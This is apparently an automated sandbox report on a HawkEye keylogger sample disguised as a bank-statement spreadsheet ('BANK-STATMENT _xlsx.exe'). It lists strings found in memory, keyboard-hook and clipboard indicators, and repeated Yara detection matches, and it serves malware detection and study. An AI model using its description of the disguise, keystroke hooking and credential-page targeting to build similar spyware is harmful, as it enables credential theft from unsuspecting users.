Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp
String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmp
String found in binary or memory: http://static-global-s-msn-com.ak
Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.801748838.0000000002B0E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884820790.0000000002B4E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmp
String found in binary or memory: http://whatismyipaddress.com
Source: BANK-STATMENT _xlsx.exe, BANK-STATMENT _xlsx.exe, 0000000F.00000002.801748838.0000000002B0E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884820790.0000000002B4E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmp
String found in binary or memory: http://whatismyipaddress.com/
Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp
String found in binary or memory: http://whatismyipaddress.com/-
Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.801748838.0000000002B0E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884820790.0000000002B4E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmp
String found in binary or memory: http://whatismyipaddress.comx&
Source: vbc.exe, 0000001A.00000002.838373686.0000000000758000.00000004.00000020.sdmp
String found in binary or memory: http://www.msn.com/?ocid=iehpEM3LMEM
Source: vbc.exe, 0000001A.00000002.838373686.0000000000758000.00000004.00000020.sdmp
String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpHLMEMh
Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp
String found in binary or memory: http://www.nirsoft.net/
Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmp
String found in binary or memory: http://www.site.com/logs.php
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSyn
                Source: BANK-STATMENT _xlsx.exe, vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?prid=190203
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803423064.0000000002ED4000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.885555940.0000000002F14000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.885555940.0000000002F14000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com/
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.803423064.0000000002ED4000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.885555940.0000000002F14000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.comx&
                Source: vbc.exe, 00000007.00000003.704761625.000000000095E000.00000004.00000001.sdmp, vbc.exe, 0000001A.00000003.837983424.00000000009CE000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
                Source: vbc.exe, 0000001A.00000002.838373686.0000000000758000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/?gws_rd=sslvbLMEMh
                Source: BANK-STATMENT _xlsx.exe, vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                Yara detected HawkEye Keylogger
                Contains functionality to log keystrokes (.Net Source)
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs, .Net Code: HookKeyboard
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs, .Net Code: HookKeyboard
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.cs, .Net Code: HookKeyboard
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs, .Net Code: HookKeyboard
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.cs, .Net Code: HookKeyboard
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.cs, .Net Code: HookKeyboard
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.cs, .Net Code: HookKeyboard
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs, .Net Code: HookKeyboard
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.cs, .Net Code: HookKeyboard
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.cs, .Net Code: HookKeyboard
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs, .Net Code: HookKeyboard
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.cs, .Net Code: HookKeyboard
                Installs a global keyboard hook
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 0_2_0040702E OpenClipboard
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 0_2_00422A48 GetClipboardData, CopyEnhMetaFileA, GetEnhMetaFileHeader
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 2_2_0042308C GetObjectA, GetDC, CreateCompatibleDC, CreateBitmap, CreateCompatibleBitmap, GetDeviceCaps, GetDeviceCaps, SelectObject, GetDIBColorTable, GetDIBits, SelectObject, CreateDIBSection, GetDIBits, SelectObject, SelectPalette, RealizePalette, FillRect, SetTextColor, SetBkColor, SetDIBColorTable, PatBlt, CreateCompatibleDC, SelectObject, SelectPalette, RealizePalette, SetTextColor, SetBkColor, BitBlt, SelectPalette, SelectObject, DeleteDC, SelectPalette
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Code function: 0_2_00458744 GetKeyboardState, SetKeyboardState, SendMessageA, SendMessageA
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.665944784.00000000006FA000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, Window created: window name: CLIPBRDWNDCLASS
                Source: Yara match, File source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5580, type: MEMORY
                Source: Yara match, File source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 6984, type: MEMORY
                Source: Yara match, File source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1548, type: MEMORY
                Source: Yara match, File source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1496, type: MEMORY
                Source: Yara match, File source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5540, type: MEMORY

                System Summary:

                Malicious sample detected (through community Yara rule)
                Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net> (type: MEMORY)
                Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group (type: MEMORY)
                Source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 34.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 34.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
